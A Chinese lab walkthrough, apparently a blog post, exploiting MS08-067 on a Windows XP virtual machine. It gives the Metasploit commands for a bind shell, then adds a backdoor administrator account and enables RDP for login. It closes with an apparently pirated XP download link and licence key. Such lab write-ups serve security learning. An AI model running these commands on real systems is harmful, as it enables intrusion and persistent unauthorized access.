MS08-067利用

一、概述

利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。
用到的端口:445、3389

二、实验环境(虚拟机搭建)

目标:windows xp professional sp3 英文版(中文版测试不成功)

攻击:Kali Linux

三、攻击过程

1.获取靶机和Kali Linux的IP地址
Windows:DOS窗口输入命令

ipconfig /all

MS08-067利用_第1张图片

Kali Linux:终端输入命令

ifconfig

MS08-067利用_第2张图片
并且能相互ping

2.调用Kali Linux中msfconsole工具的ms08-067漏洞攻击模块
以下所有操作都是在Kali Linux的终端中完成
启动msfconsole工具

msfconsole

MS08-067利用_第3张图片

输入

search ms08-067

(查找漏洞攻击模块)

输入

use exploit/windows/smb/ms08_067_netapi

(使用该模块)
MS08-067利用_第4张图片

3.配置options

set LHOST 172.16.165.137

set RHOST 172.16.165.135

set RPORT 445

MS08-067利用_第5张图片

show payloads

MS08-067利用_第6张图片

set payload generic/shell_bind_tcp



show options

MS08-067利用_第7张图片

4.实施攻击

exploit

MS08-067利用_第8张图片

此时可以直接远程使用DOS命令对Windows进行操作

5.对Windwos进行远程连接

net user admin pass /add && net localgroup administrators admin /add

(在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限)
MS08-067利用_第9张图片

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

(开启windows远程登录端口)
MS08-067利用_第10张图片

netstat -an

(检查3389端口是否开启)
MS08-067利用_第11张图片

重新打开一个终端

rdesktop 172.16.165.135

进行远程登录

MS08-067利用_第12张图片

输入创建的用户名admin和密码pass回车 弹出提示框 点击OK 稍等就会成功远程登录

MS08-067利用_第13张图片

漏洞利用成功

四、用到的资源

Windows XP SP3 英文版下载地址:

ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso|617754624|7d1e7466df638674202dd8e7451c0b39|h=5JYEVQUSWB7WMCVM7JWGPNOIZFNTQXJY|

序列码:DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ

你可能感兴趣的:(渗透)